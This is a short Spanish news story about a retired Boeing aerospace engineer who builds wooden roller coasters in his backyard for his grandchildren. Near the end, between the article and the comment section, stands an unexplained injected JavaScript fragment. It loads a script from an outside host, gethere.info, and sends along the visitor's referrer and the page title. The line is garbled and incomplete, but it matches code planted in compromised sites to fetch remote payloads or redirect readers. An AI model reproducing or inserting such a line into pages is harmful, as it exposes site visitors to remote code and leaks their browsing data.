Abuelo construye montaña rusa para sus nietos en el patio de su casa

El video de este abuelo se ha convertido en todo un fenómeno viral en otras partes del mundo y es que luego de jubilarse, ocupa su tiempo para entretener a su nietos

Un antiguo ingeniero aeroespacial, se mantiene ocupado construyendo montañas rusas en su jardín trasero para que sus nietos lo disfruten.

Luego de trabajar por 34 años en la compañía Boeing, Paul Gregg disfruta de su jubilación junto a sus nietos de una manera muy particular.

Y es que este abuelo, dejó las de aeronaves, para fabricar una montaña rusa para sus nietos en el patio trasero.

Gregg subió a las redes sociales un video en el que aparecen 2 de sus 6 nietos probando el divertido juego.

El abuelo construyó la montaña rusa con madera y tiene que empujar los coches en la primera joroba, pero una vez que han tomado impulso, los vehículos siguen por la pista.

Paul Gregg incluso se ha dado la molestia de adaptar uno de los carros para que parezca un coche de carreras, y el otro un cohete.

Para los nietos del señor Gregg la diversión está asegurada, pues no paran de reír y gritar mientras montan el juego casero.

Con Información de: Daily Mail 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado